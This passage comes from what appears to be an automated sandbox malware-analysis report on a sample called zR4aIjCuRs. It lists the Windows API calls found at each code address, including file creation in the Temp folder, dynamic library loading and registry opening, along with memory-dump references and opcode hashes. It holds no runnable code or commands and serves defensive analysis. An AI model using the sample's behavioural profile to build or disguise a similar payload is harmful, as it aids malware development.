                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CloseDeleteValue
                                  • String ID:
                                  • API String ID: 2831762973-0
                                  • Opcode ID: 6e579435eca9b4b687e1d7b96289a1719cefcc3e0237eeeb9f7ae371a7a8e2b7
                                  • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                  • Opcode Fuzzy Hash: 6e579435eca9b4b687e1d7b96289a1719cefcc3e0237eeeb9f7ae371a7a8e2b7
                                  • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                  APIs
                                  • OleInitialize.OLE32(00000000), ref: 00405405
                                    • Part of subcall function 0040427D: SendMessageW.USER32(0002046A,00000000,00000000,00000000), ref: 0040428F
                                  • CoUninitialize.COMBASE(00000404,00000000), ref: 00405451
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: InitializeMessageSendUninitialize
                                  • String ID:
                                  • API String ID: 2896919175-0
                                  • Opcode ID: dfabe2086e3d1963a552e06cb88e9d9118769e23e40608fad565f0601b73f887
                                  • Instruction ID: a601a601f0e5ec3bbde9495229b78238806b827976c2972870ecc0a3321c7521
                                  • Opcode Fuzzy Hash: dfabe2086e3d1963a552e06cb88e9d9118769e23e40608fad565f0601b73f887
                                  • Instruction Fuzzy Hash: 85F090765405009BD7015B949D01BE777A4EFD431AF09843EFE85722E09B7958828E6D
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                    • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                    • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                    • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                  • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                  • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                  • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                  • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                  • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                  • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                  • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                  • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                  APIs
                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: PrivateProfileStringWrite
                                  • String ID:
                                  • API String ID: 390214022-0
                                  • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                  • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                  • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                  • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                  • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                  • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                  • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                  • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Space available: ,?), ref: 0040614B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                  • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                  • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                  APIs
                                  • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040424B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: ItemText
                                  • String ID:
                                  • API String ID: 3367045223-0
                                  • Opcode ID: e97594aea4ef24126c33863332ae7c1030a5f9b1799084ec29790e1dd493689a
                                  • Instruction ID: 58c8b0ee816a9f079cb4560b894257bfb9dfa06490f5d5235509ae25e2c95a64
                                  • Opcode Fuzzy Hash: e97594aea4ef24126c33863332ae7c1030a5f9b1799084ec29790e1dd493689a
                                  • Instruction Fuzzy Hash: 79C04C76148300BFD681BB55CC42F1FB79DEF94315F44C52EB59CA11E2C63A84309B26
                                  APIs
                                  • SendMessageW.USER32(0002046A,00000000,00000000,00000000), ref: 0040428F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
